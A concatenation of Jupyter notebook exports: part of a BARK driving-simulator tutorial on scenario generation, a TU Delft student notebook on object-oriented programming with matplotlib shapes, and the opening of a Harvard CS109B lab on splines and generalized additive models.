"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"EnforceControlledGoal": true,
"GoalTypeOthers": "EndOfLane",
"EnforceOthersGoal": true,
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "RandomSingleAgent"
},
"AgentParams": {
"MaxHistoryLength": 50
}
}
],
"ConflictResolution": {
"left_lane/right_lane": [
0.2,
0.8
]
}
}
}
}
}
###Markdown
In the default configuration, we have two sources and sinks specified. One for the left lane of the road corridor on an highway, one for the right lane. We use the config reader type UniformVehicleDistribution for ConfigAgentStatesGeometries. There, we can specify vehicle distance ranges and ranges of initial velocity. As behavior model config, we use FixedBehaviorType, where one type of behavior model with its parameters is specified. Goal definition uses config reader FixedGoalTypes enabling separate specification of goal definitions for controlled and non-controlled agents. It uses a FrenetGoalType with a geometric goal region around the centerline of the goal lane. The range of this region is specified via parameter LongitudinalRange. With BARKs runtime, we can have a look through the sceanarios created with the default parameter config:
###Code
%matplotlib qt
from bark.runtime.viewer.matplotlib_viewer import MPViewer
from bark.runtime.runtime import Runtime
import matplotlib.pyplot as plt
import time
params["Visualization"]["Agents"]["DrawAgentId"] = False
plt.figure(figsize=(5, 5))
viewer = MPViewer(
params=params,
y_length = 160,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=False,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 10
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
world.Step(step_time)
time.sleep(step_time/4)
viewer.clear()
plt.close()
###Output
_____no_output_____
###Markdown
We see the controlled agent in red and its goal region on the right lane. We now tune the parameters that the controlled agents goal is on the left lane. Additionally, we want to create more dense traffic on the left lane to make the lane change scenario harder. We decrease the range for sampling distances and velocityand recreate the scenarios:
###Code
params_src_sink_right = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]
params_src_sink_right["ConfigGoalDefinitions"]["GoalTypeControlled"] = "LaneChangeLeft"
params_src_sink_left = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][0]
params_src_sink_left["ConfigAgentStatesGeometries"]["VehicleDistanceRange"] = [5, 10]
params_src_sink_left["ConfigAgentStatesGeometries"]["OtherVehicleVelocityRange"] = [1, 2]
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
num_scenarios_to_show = 10
num_steps_per_scenario = 4
step_time = 0.2
plt.figure(figsize=(5, 5))
viewer = MPViewer(
params=params,
y_length = 160,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=False,
axis=plt.gca())
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
world.Step(step_time)
time.sleep(step_time)
viewer.clear()
plt.close()
###Output
<bark.runtime.commons.parameters.ParameterServer object at 0x7f70a4e9f9b0>
bark/runtime/tests/data/city_highway_straight.xodr
###Markdown
3.5 Writing an own config reader to sample behavior typeThere is a number of config readers defined in [config_readers](https://github.com/bark-simulator/bark/tree/master/bark/runtime/scenario/scenario_generation/config_readers) and we plan to extend this set further in the future. In this section, we demonstrate how to write your own config reader, writing a config reader for behavior model sampling. But the process can be easily applied to the other config reader types as well.The config reader shall randomly sample behavior types among a list of specified behavior types. We reimplement the interface of ConfigReaderBehaviorModels as follows
###Code
from bark.runtime.scenario.scenario_generation.config_readers.config_readers_interfaces import ConfigReaderBehaviorModels
from bark.core.models.behavior import *
from bark.runtime.commons.parameters import ParameterServer
class SampleBehaviorType(ConfigReaderBehaviorModels):
def __init__(self, random_state):
super().__init__(random_state)
self.param_servers = []
def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
model_types = config_param_object["ModelTypesList", "Type of behavior model" \
"used for all vehicles", ["BehaviorIDMClassic", "BehaviorMobil"]]
model_params = config_param_object.AddChild("ModelParams")
# ----- DEFAULT PARAMETER HANDLING
# based on types retrieve default params which are maintained as scenario defaults
for model_type in model_types:
behavior_params = model_params.AddChild(model_type)
_, _ = self.model_from_model_type(model_type, behavior_params)
#param server must be persisted for each behavior to enable serialization of parameters
#------ BEHAVIOR MODEL SAMPLING
behavior_models = []
behavior_model_types = []
for _ in agent_states:
model_idx = self.random_state.randint(low=0, high=len(model_types), size=None)
model_type = model_types[model_idx]
model_type_params = model_params.AddChild(model_type)
params = ParameterServer()
bark_model, params = self.model_from_model_type(model_type, model_type_params)
self.param_servers.append(model_type_params)
behavior_models.append(bark_model)
behavior_model_types.append(model_type)
return behavior_models, {"behavior_model_types" : behavior_model_types}, config_param_object
def model_from_model_type(self, model_type, params):
bark_model = eval("{}(params)".format(model_type))
return bark_model, params
def get_param_servers(self):
return self.param_servers
###Output
_____no_output_____
###Markdown
The main functionality is covered in `create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs)`. Here, we first read a list of behavior types from the parameter server and read it out the default parameters of these model types. Then, we use the global random seed state managed by the scenario generation to sample the behavior types. Note that the parameter servers of objects must be persisted to allow for serialization of behavior models. This class definition must be found by ConfigurableScenarioGeneration. We put it into the [behavior_model_config_readers.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/behavior_model_config_readers.py) containing the already existing ConfigReaderBehaviorModels.Now, we use this config to randomly sample Mobil and IDM models on the right highway lane. We can first set the type of ConfigBehaviorModels to our new definition. By rerunning the scenario generation, all **default parameters are automatically extracted**. Afterwards, we can finetune these parameters. First let's specify the new config type and extract the defaults. To specify a config type simply use the name given to the config reader class. We now have the following initial source sink config and running the scenario generation gives as the default params. These can of course be customized as desired
###Code
sink_source_dict = [{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [0]},
"ConfigBehaviorModels": {"Type": "FixedBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "NoneControlled"},
"AgentParams" : {}
},
{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [1]},
"ConfigBehaviorModels": {"Type": "SampleBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "RandomSingleAgent"},
"AgentParams" : {}
}]
params = ParameterServer()
params["World"]["remove_agents_out_of_map"] = True
params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] = sink_source_dict
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=10,params=params)
print("\n\n ------ ConfigBehaviorModels Default Parameters ---------")
print(json.dumps(params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] \
[1]["ConfigBehaviorModels"].ConvertToDict(), indent=4))
params["Visualization"]["Agents"]["DrawAgentId"] = False
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 1600,
enforce_y_length=True,
enforce_x_length=False,
use_world_bounds=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
world.Step(step_time)
viewer.clear()
plt.close()
###Output
_____no_output_____ |
Computerprogrameren TUDelft/Notebook 09 Object oriented programming/Halem_4597591_nb_notebook9.ipynb | ###Markdown
Exploratory Computing with Python*Developed by Mark Bakker* Notebook 9: Object oriented programming In this Notebook, we learn what Object Oriented Programming (OOP) is, what Classes are and how to write our own, and we learn how to make graphs using OOP and and the `matplotlib` package.
###Code
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
A Triangle ClassSo far, we have learned what is called *functional* programming. In functional programming you write or use functions that manipulate data. For example, consider the case where we have to deal with a number of triangles. For each triangle we want to be able to compute its area, and we want to be able to plot it, and fill the inside with a color. Say we have an arbitrary number of $N$ triangles. For each triangle we need to store the $(x,y)$ values of its three corner points. So we create arrays for the $x$ values of each corner point, we create arrays for the $y$ values of each corner point. Then we write a function that computes the area of a triangle given its three corners, and we write a function that plots the triangle given the three corner points and color to fill the triangle, and finally we need to loop through all the corner points. This all sounds like a bit of work, but it is tracktable. It already gets more complicated when we want to change the corner point of one triangle. We have to know its place in the array, and change the correct corner point.It gets even more complicated when we have to deal with both triangles and rectangles. Triangles have three corner points, while rectangles have four corner points. The function to compute the area of a rectangle is very different, hence we have to make sure we call the area function for a triangle when we have a triangle, and the area function for a rectangle when we have a rectangle. The plotting is not much different, but we have to supply it four corner points rather than three. This gets a bit messier already. Wouldn't it be nice if it was possible to organize the data and functions in such a way that the data itself knows how to compute its area or how to plot itself? That may sound magical, but that is exactly what Object Oriented Programming does. Object oriented programming is, in essence, just another way of organizing your data and functions. Rather than defining and storing them separately, the data and functions are stored and bound together in what is called a *Class*. The data that are stored are called *attributes*, and the functions are called *methods*. This is probably easiest understood by writing a class and using it. Consider, for example, the class `Triangle` that stores the coordinates of the three corner points. Don't worry about the syntax yet (we will get back to that). Run the code below so we can start using the class.
###Code
class Triangle:
def __init__(self, x0y0, x1y1, x2y2):
self.x0y0 = x0y0
self.x1y1 = x1y1
self.x2y2 = x2y2
###Output
_____no_output_____
###Markdown
Now that the `Triangle` class is defined, we can start creating triangles. We can call the `Triangle` class just like a function and we need to provide it tuples of the three corner points. The `Triangle` class returns what is called an object. An object is an instance of a class. Note also, that when you type `Triangle(` and hit [shift][tab], a small box pops up showing what input arguments are expected (you don't need to provide the `self` argument; more on that later). Let's create a triangle with corners (0,1), (3,0) and (2,3).
###Code
t1 = Triangle((0,1), (3,0), (2,3))
###Output
_____no_output_____
###Markdown
`t1` is now an instance of the class `Triangle`. We simply say that `t1` is a triangle. We have stored the three corner points of the triangle. Hence, each `Triangle` object has three attributes. You can find out what attributes an object has by typing `t1.` (don't forget the dot) and then hit the [TAB] key. The attributes can be accessed with the *dot syntax*.
###Code
print(t1) # not very useful
print(t1.x0y0) # first corner point
print(t1.x1y1) # second corner point
print(t1.x2y2) # third corner point
###Output
<__main__.Triangle object at 0x000002BAB7668E10>
(0, 1)
(3, 0)
(2, 3)
###Markdown
Let's get back to the `Triangle` class. When we call the `Triangle` class (official lingo: we create a `Triangle` object, or more officially yet: we create an instance of the `Triangle` class), Python calls the `__init__` function. This function is called the *constructor*. It constructs an object. In the constructor you define what arguments need to be provided to create a triangle. The name `__init__` (that is *two* underscores before and after the word `init`) is required (it is one of the few unfortunate name choices of the Python language). The first argument is `self` and tells Python what the object itself is called inside the class. We saw above that typing `print t1` returns a meaningless message. This can be resolved by including a representation function, which needs to be called `__repr__`. This function is called when the object is printed (or converted to a string).
###Code
class Triangle:
def __init__(self, x0y0, x1y1, x2y2):
self.x0y0 = x0y0
self.x1y1 = x1y1
self.x2y2 = x2y2
def __repr__(self):
return 'Triangle with corners:' + str(self.x0y0) + str(self.x1y1) + str(self.x2y2)
t1 = Triangle((0,1), (3,0), (2,3))
print(t1)
###Output
Triangle with corners:(0, 1)(3, 0)(2, 3)
###Markdown
In the Triangle class, the three corner points are stored as three tuples. Hence, the $x$ value of the first corner point is `self.x0y0[0]` and the $y$ value is `self.x0y0[1]`. It may be useful to store one array of the three $x$ values of the three corner points and one array of the three $y$ values of the corner points. If those are stored, it is fairly easy to compute the area $A$ of a triangle using the following formula$A = \frac{1}{2}|(x_0-x_2)(y_1-y_0) - (x_0-x_1)(y_2-y_0)|$Let's modify the `Triangle` class to include these two additional attributes and an `area` function
###Code
class Triangle:
def __init__(self, x0y0, x1y1, x2y2):
self.x0y0 = x0y0
self.x1y1 = x1y1
self.x2y2 = x2y2
self.x = np.array([self.x0y0[0], self.x1y1[0], self.x2y2[0]])
self.y = np.array([self.x0y0[1], self.x1y1[1], self.x2y2[1]])
def __repr__(self):
return 'Triangle with corners:' + str(self.x0y0) + str(self.x1y1) + str(self.x2y2)
def area(self):
A = 0.5 * np.abs((self.x[0] - self.x[2]) * (self.y[1] - self.y[0]) -
(self.x[0] - self.x[1]) * (self.y[2] - self.y[0]))
return A
###Output
_____no_output_____
###Markdown
Note that the `area` function gets passed the object `self`; once it knows what `self` is, it has access to all its attributes and functions. We can now create a `Triangle` object and compute its area as follows (don't forget to run the new `Triangle` class above first)
###Code
t1 = Triangle( (0,1), (3,0), (2,3) )
print(t1.area())
###Output
4.0
###Markdown
In the code above, the `area` function is called using the *dot* syntax, where `self` in the function is automatically replaced with the variable before the dot (in this case `t1`). The *dot* syntax is short for the much longer
###Code
print(Triangle.area(t1))
###Output
4.0
###Markdown
Note that classes are very convenient, as the triangle object knows what its own corner points are. When typing `t1.`[TAB], not only all attributes but also all functions of an object are shown. Try it:
###Code
# type t1. and then a tab
###Output
_____no_output_____
###Markdown
Let's expand the `Triangle` class by adding a function that plots a filled triangle. The color of the triangle is supplied with a keyword argument in the constructor. Hence, when it is not provided, the default value will be used.
###Code
class Triangle:
def __init__(self, x0y0, x1y1, x2y2, color='b'):
self.x0y0 = x0y0
self.x1y1 = x1y1
self.x2y2 = x2y2
self.x = np.array([self.x0y0[0], self.x1y1[0], self.x2y2[0]])
self.y = np.array([self.x0y0[1], self.x1y1[1], self.x2y2[1]])
self.color = color
def __repr__(self):
return 'Triangle with corners:' + str(self.x0y0) + str(self.x1y1) + str(self.x2y2)
def area(self):
A = 0.5 * np.abs((self.x[0]-self.x[2])*(self.y[1]-self.y[0]) -
(self.x[0]-self.x[1])*(self.y[2]-self.y[0]))
return A
def plot(self):
plt.fill(self.x, self.y, color=self.color)
###Output
_____no_output_____
###Markdown
Let's create three triangles and store them in a list. Then we loop through the triangles in the list and plot them in one graph. Note how we can loop through the triangles in the list `tlist`:`for t in tlist:`So every time we go through the loop, `t` is the next triangle in the list `tlist`.
###Code
tlist = [] # start with an empty list
t1 = Triangle((0,1), (5,0), (3,3), 'b')
tlist.append(t1) # add t1 to the list
t2 = Triangle((3,4), (1,6), (-2,3), 'r')
tlist.append(t2)
t3 = Triangle((8,-1), (6,4), (2,6), 'g')
tlist.append(t3)
plt.figure()
for t in tlist:
t.plot()
plt.axis('scaled');
###Output
_____no_output_____
###Markdown
Similarly, the total area of the three triangles is
###Code
areatot = 0.0
for t in tlist:
areatot += t.area()
print('total area:', areatot)
###Output
total area: 20.5
###Markdown
Exercise 1. A Rectangle classCreate a `Rectangle` class for rectangles that stand straight up, so that the base is horizontal. Input arguments are the $(x,y)$ values of the lower-left-hand corner, the width of the base and the height. Class functions are: `area`, which returns the area of the rectangle and `plot`, which plots a filled rectangle using a transparancy of 0.5 (i.e., use keyword argument `alpha=0.5` in the `fill` function). Fill the rectangle with the color blue when the width of the rectangle is larger than the height, and fill it with the color red when the width is smaller than the height. Demonstrate that your `Rectangle` class works by plotting two rectangles, one with lower-left-hand corner (0, 0), width 10 and height 5, and the other with lower-left-hand corner (2, 0), width 4 and height 8.
###Code
class Rectangle:
def __init__(self, x1, y1, base, height):
self.x1 = x1
self.y1 = y1
self.base = base
self.height = height
self.x = np.array([self.x1, (self.x1 + self.base), (self.x1 + self.base), self.x1])
self.y = np.array([self.y1, self.y1, (self.y1 + self.height), (self.y1 + self.height)])
def plot(self):
if (self.base/self.height) < 1:
color = 'r'
else:
color = 'b'
plt.fill(self.x, self.y, alpha = 0.5, color = color)
def area(self):
A = self.base * self.height
self.plot
return A
r1 = Rectangle(0, 0, 10, 5)
r2 = Rectangle(2, 0, 4, 8)
print(r1.area())
print(r2.area())
r1.plot()
r2.plot()
###Output
50
32
###Markdown
Exercise 2. Many rectanglesDemonstrate that your `Rectangle` class works by loading the text file `rectangle_data.txt`. This file contains the $x$, $y$, width, and height for 20 rectangles. Compute and report the total area of all the rectangles in the file. Make a plot of the 20 rectangles to demonstrate that the colors are assigned correctly.
###Code
r = np.genfromtxt('rectangle_data.txt', delimiter=' ' )
rlist = []
z = 0
for j in range(len(r[:,0])):
t = Rectangle(r[j,0], r[j,1], r[j,2], r[j,3])
t.plot()
plt.axis('scaled');
###Output
_____no_output_____
###Markdown
Arrays are objectsNow that you have learned about OOP, you may realize that many of the Python features you use are actually based on OOP. For example, when you create an array, the array is an object.
###Code
x = np.arange(12)
print('type of x:', type(x))
###Output
type of x: <class 'numpy.ndarray'>
###Markdown
Hence, an array has attributes and class methods associated with it. You can type `dir(x)` to find out all attributes and methods (there are many). Some of the attributes of an array include the number of dimensions and the shape. You can even change the shape (as long as you make sure the shape fits the array) by modifying the shape attribute.
###Code
print('number of dimensions of x:', x.ndim)
print('shape of x:', x.shape)
x.shape = (4, 3)
print('new shape of x:', x.shape)
print(x)
###Output
number of dimensions of x: 1
shape of x: (12,)
new shape of x: (4, 3)
[[ 0 1 2]
[ 3 4 5]
[ 6 7 8]
[ 9 10 11]]
###Markdown
An array also has a number of functions, including a function that returns the mean value of the array or the maximum value of an array.
###Code
print('mean of x: ', x.mean())
print('max of x: ', x.max())
###Output
mean of x: 5.5
max of x: 11
###Markdown
Plotting features are objectsAll plotting commands we have used so far are functions that are part of the `matplotlib` package. Not surpringly, `matplotlib` has an object-oriented design. Plots may be created by making use of the object-oriented structure. This requires a bit of additional typing, but in the end, we gain additional flexibility and the ability to make animations.Using the OO syntax, we first create a `figure` object and specify the size using the `figsize` keyword argument (the size of the figure is specified in inches), then we add an axis to the figure with the `add_axes` command (note that it is `axes` with an `e`) by specifying the *relative* location of the axis in the figure. The location of the left, bottom, width, and height are specified in relative coordinates (both the horizontal and vertical direction run from 0 to 1). To plot, we use the `plot` method of the axis.
###Code
x = np.linspace(0, 2, 100)
y = x ** 2
fig = plt.figure(figsize=(10, 5))
ax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax1.plot(x, y, 'b')
ax1.set_xlabel('x')
ax1.set_ylabel('y')
ax1.set_title('Example figure');
###Output
_____no_output_____
###Markdown
We can add as many axes to the figure as we want and decide exactly where each axis is located.
###Code
ax2 = fig.add_axes([0.15,0.5,0.4,0.3])
ax2.plot(x,-y,'r')
ax2.set_title('Second axis');
###Output
_____no_output_____
###Markdown
Matplotlib patchesThe plotting package `matplotlib` includes a set of classes to define shapes, which are called *patches* in `matplotlib`. There are patches for many different shapes including circles, ellipses, polygons, wedges, and arrows. Here we learn how to draw these patches. We learn how to make them move interactively in a future notebook.The process for adding a patch to a graph is always the same. First you create an axis, then you create a patch object and you add the patch object to the axis. Each patch object has a few input arguments and a number of keyword arguments. The keyword arguments include: `ec` for edge color, `fc` for face color, `alpha` for transparancy, and `zorder` for the order in which they are plotted (the patch with the highest `zorder` value lies on top). The names of all patch classes start with a capital: `Circle`, `Ellipse`, `Polygon`, `Wedge`, `Arrow`. You need to import these classes from `matplotlib.patches` to be able to use them. Use the help system to learn about the required input arguments. The graph below contains two circles, where the smaller one is on top of the larger one. The background color of the graph is set to the same color as the small circle (using the `fc` (facecolor) keyword of the `add_axes` function), so that it looks like the large circle has a hole. The aspect ratio of the axis is set to `'equal'` when the axis is created. The `autoscale` function needs to be called to set the limits of the axis such that the patches fit exactly in the axis. Alternatively, you can call the `ax.set_xlim` and `ax.set_ylim` functions to select limits of your own choice.
###Code
from matplotlib.patches import Circle
fig = plt.figure()
ax = fig.add_axes([.1, .1, .8, .8], fc='violet', aspect='equal')
small = Circle(xy=(3, 5), radius=1, fc='violet', ec='violet', zorder=2)
big = Circle(xy=(2, 4), radius=3, fc='dodgerblue', ec='dodgerblue', zorder=1)
print(big)
ax.add_patch(small)
ax.add_patch(big)
ax.autoscale()
###Output
_____no_output_____
###Markdown
Exercise 3. `Circle` patchCreate a plot with 20 circles with radius 0.2 using `Circle` pathes, with their centers equally spaced (in $x$) along the line $y=\sin(x)$ for $x$ going from 0 to $2\pi$.
###Code
from matplotlib.patches import Circle
x = np.linspace(0, 2 * np.pi, 20)
y = np.sin(x)
r = 0.2
fig = plt.figure()
ax = fig.add_axes([.1, .1, .8, .8], aspect='equal')
for i in range(len(x)):
c = Circle(xy=(x[i], y[i]), radius = r)
ax.add_patch(c)
ax.autoscale()
###Output
_____no_output_____
###Markdown
Exercise 4. `Arrow` patchCreate 20 arrows with width 0.2 using `Arrow` patches. The starting points of the arows are equally spaced (in $x$) along the line $y=\sin(x)$ for $x$ going from 0 to $2\pi$. The arrow is 0.2 long in $x$ direction (`dx=0.2`) and the length and sign in $y$ direction (`dy`) needs to be chosen such that the arrow is tangent to the line $y=\sin(x)$ at its starting point. (Hint: use the derivative of the line.)
###Code
from matplotlib.patches import Arrow
x = np.linspace(0, 2 * np.pi, 20)
y = np.sin(x)
r = 0.2
fig = plt.figure()
ax = fig.add_axes([.1, .1, .8, .8], aspect='equal')
for i in range(len(x)):
c = Arrow(x[i], y[i], 0.2, np.cos(x[i])*0.2, width = 0.2 )
ax.add_patch(c)
ax.autoscale()
###Output
_____no_output_____
###Markdown
Exercise 5. Packing circles in a squareConsider trying to put as many non-overlapping circles as possible in a square area. All circles have the same radius. The highest packing density (relative area covered by the circles) is obtained by putting the circles in stacked rows as shown in the figure below, which has a packing density of 0.9069. For more information on circle packing, including circles with different radii, see [here](http://en.wikipedia.org/wiki/Circle_packing). We are going to put circles in a square area by generating locations randomly. Put as many circles with radius 0.05 in a square with sides equal to 1 (lower left-hand corner $(x,y)=(0,0)$, upper right-hand corner $(x,y)=(1,1)$) by randomly generating centers of the circles with the `np.random.rand` function.First, write a function called `overlap` that takes as input arguments two `Circle` patches and returns `True` when the circles overlap and `False` when they don't overlap. Each `Circle` patch has attributes `center` and `radius`. Note that a `Circle` patch stores its center as attribute `center`. Test your code with the following three circles: c1 = Circle(xy=(0, 0), radius=5) c2 = Circle(xy=(5, 0), radius=2) c3 = Circle(xy=(2, 5), radius=1) print 'overlap(c1, c2):', overlap(c1, c2) overlaps print 'overlap(c2, c3):', overlap(c2, c3) doesn't overlap print 'overlap(c1, c3):', overlap(c1, c3) overlaps
###Code
def overlap(c1, c2):
A = None
r1 = c1.radius
r2 = c2.radius
x1 = c1.center[0]
x2 = c2.center[0]
y1 = c1.center[1]
y2 = c2.center[1]
if np.sqrt((x2-x1)**2 + (y2-y1)**2 ) < r1 + r2:
A = True
else:
A = False
return A
c1 = Circle(xy=(0, 0), radius=5)
c2 = Circle(xy=(5, 0), radius=2)
c3 = Circle(xy=(2, 5), radius=1)
print ('overlap(c1, c2):', overlap(c1, c2)) # overlaps
print ('overlap(c2, c3):', overlap(c2, c3)) # doesn't overlap
print ('overlap(c1, c3):', overlap(c1, c3)) # overlaps
###Output
overlap(c1, c2): True
overlap(c2, c3): False
overlap(c1, c3): True
###Markdown
Exercise 6. Create a list to store all circles that fit inside the unit square. Generate random locations of the circles with the `np.random.rand` function, which returns random values between 0 and 1. All circles have radius 0.05. Check whether a generated circle fits entirely inside the unit square. If it fits inside the square, use the `overlap` function that you wrote in the previous exercise to determine whether it overlaps with any of the circles in the list. If it doesn't overlap with any of the other circles, then add it to the list. Stop when you have generated 50 circles (it is very difficult to fit more non-overlapping circles inside the square with this procedure). Create a plot showing your 50 circles.
###Code
from matplotlib.patches import Circle
fig = plt.figure()
ax = fig.add_axes([.1, .1, .8, .8], aspect='equal')
clist = []
r = 0.05
clist.append(Circle(xy = (0.9 * np.random.rand(2,1) + 0.05), radius = r))
while len(clist) < 50:
k = 0
g = False
z = Circle(xy = (0.9 * np.random.rand(2,1) + 0.05), radius = r)
for i in range(len(clist)):
if overlap(clist[i], z) == True:
g = True
break
if g == False:
clist.append(z)
ax.add_patch(z)
###Output
_____no_output_____ |
content/labs/lab2/.ipynb_checkpoints/cs109b_lab2_smooths_and_GAMs_more-checkpoint.ipynb | ###Markdown
CS109B Data Science 2: Advanced Topics in Data Science Lecture 5.5 - Smoothers and Generalized Additive Models - Model FittingJUST A NOTEBOOK + SOME ADDITIONS (see New Material) **Harvard University****Spring 2021****Instructors:** Mark Glickman, Pavlos Protopapas, and Chris Tanner**Lab Instructor:** Eleni Kaxiras*Content:* Eleni Kaxiras and Will Claybaugh--- New material here: - [References](bsplines)- [info on B-spline basis functions](basis) - [Cleaner formula for csaps](csaps)Also cleaner Table of Contents
###Code
## RUN THIS CELL TO PROPERLY HIGHLIGHT THE EXERCISES
import requests
from IPython.core.display import HTML
styles = requests.get("https://raw.githubusercontent.com/Harvard-IACS/2019-CS109B/master/content/styles/cs109.css").text
HTML(styles)
import numpy as np
from scipy.interpolate import interp1d
import matplotlib.pyplot as plt
import pandas as pd
%matplotlib inline
###Output
_____no_output_____
###Markdown
Table of Contents* 1 - Overview - A Top View of LMs, GLMs, and GAMs to set the stage* 2 - Splines* 3 - Generative Additive Models with `pyGAM`* 4 - Smooting Splines using `csaps`* 5 - Penalized B-splines 1 - Overview*image source: Dani Servén Marín (one of the developers of pyGAM)* A - Linear ModelsFirst we have the **Linear Models** which you know from 109a. These models are linear in the coefficients. Very *interpretable* but suffer from high bias because let's face it, few relationships in life are linear. Simple Linear Regression (defined as a model with one predictor) as well as Multiple Linear Regression (more than one predictors) are examples of LMs. Polynomial Regression extends the linear model by adding terms that are still linear for the coefficients but non-linear when it somes to the predictiors which are now raised in a power or multiplied between them.$$\begin{aligned}y = \beta{_0} + \beta{_1}{x_1} & \quad \mbox{(simple linear regression)}\\y = \beta{_0} + \beta{_1}{x_1} + \beta{_2}{x_2} + \beta{_3}{x_3} & \quad \mbox{(multiple linear regression)}\\y = \beta{_0} + \beta{_1}{x_1} + \beta{_2}{x_1^2} + \beta{_3}{x_3^3} & \quad \mbox{(polynomial multiple regression)}\\\end{aligned}$$ Questions to think about - What does it mean for a model to be **interpretable**? - Are linear regression models interpretable? Are random forests? What about Neural Networks such as Feed Forward? - Do we always want interpretability? Describe cases where we do and cases where we do not care. B - Generalized Linear Models (GLMs)**Generalized Linear Models** is a term coined in the early 1970s by Nelder and Wedderburn for a class of models that includes both Linear Regression and Logistic Regression. A GLM fits one coefficient per feature (predictor). C - Generalized Additive Models (GAMs)Hastie and Tidshirani coined the term **Generalized Additive Models** in 1986 for a class of non-linear extensions to Generalized Linear Models.$$\begin{aligned}y = \beta{_0} + f_1\left(x_1\right) + f_2\left(x_2\right) + f_3\left(x_3\right) \\y = \beta{_0} + f_1\left(x_1\right) + f_2\left(x_2, x_3\right) + f_3\left(x_3\right) & \mbox{(with interaction terms)}\end{aligned}$$In practice we add splines and regularization via smoothing penalties to our GLMs. *image source: Dani Servén Marín* D - Basis FunctionsIn our models we can use various types of functions as "basis". - Monomials such as $x^2$, $x^4$ (**Polynomial Regression**)- Sigmoid functions (neural networks)- Fourier functions - Wavelets - Regression splines- Smoothing splines 2 - Piecewise Polynomials a.k.a. SplinesSplines are a type of piecewise polynomial interpolant. A spline of degree k is a piecewise polynomial that is continuously differentiable k − 1 times. Splines are the basis of CAD software and vector graphics including a lot of the fonts used in your computer. The name “spline” comes from a tool used by ship designers to draw smooth curves. Here is the letter $epsilon$ written with splines:*font idea inspired by Chris Rycroft (AM205)*If the degree is 1 then we have a Linear Spline. If it is 3 then we have a Cubic spline. It turns out that cubic splines because they have a continous 2nd derivative (curvature) at the knots are very smooth to the eye. We do not need higher order than that. The Cubic Splines are usually Natural Cubic Splines which means they have the added constrain of the end points' second derivative = 0.We will use the CubicSpline and the B-Spline as well as the Linear Spline. scipy.interpolateSee all the different splines that scipy.interpolate has to offer: https://docs.scipy.org/doc/scipy/reference/interpolate.html. These routines are based on the FORTRAN library FITPACK written in the '70s.Let's use the simplest form which is interpolate on a set of points and then find the points between them.
###Code
from scipy.interpolate import splrep, splev
from scipy.interpolate import BSpline, CubicSpline
from scipy.interpolate import interp1d
# define the range of the function
a = -1
b = 1
# define the number of knots
num_knots = 11
# define the knots as equally spaced points
knots = np.linspace(a,b,num_knots)
# define the function we want to approximate
y = 1/(1+25*(knots**2))
# make a linear spline
linspline = interp1d(knots, y)
# sample at these points to plot
xx = np.linspace(a,b,1000)
yy = 1/(1+25*(xx**2))
plt.plot(knots,y,'*')
plt.plot(xx, yy, label='true function')
plt.plot(xx, linspline(xx), label='linear spline');
plt.legend();
###Output
_____no_output_____
###Markdown
ExerciseThe Linear interpolation does not look very good. Fit a Cubic Spline and plot along the Linear to compare. Feel free to solve and then look at the solution.
###Code
# your answer here
# solution
# define the range of the function
a = -1
b = 1
# define the knots
num_knots = 10
x = np.linspace(a,b,num_knots)
# define the function we want to approximate
y = 1/(1+25*(x**2))
# make the Cubic spline
cubspline = CubicSpline(x, y)
print(f'Num knots in cubic spline: {num_knots}')
# OR make a linear spline
linspline = interp1d(x, y)
# plot
xx = np.linspace(a,b,10000)
yy = 1/(1+25*(xx**2))
plt.plot(xx, yy, label='true function')
plt.plot(x,y,'*', label='knots')
plt.plot(xx, linspline(xx), label='linear');
plt.plot(xx, cubspline(xx), label='cubic');
plt.legend();
###Output
Num knots in cubic spline: 10
###Markdown
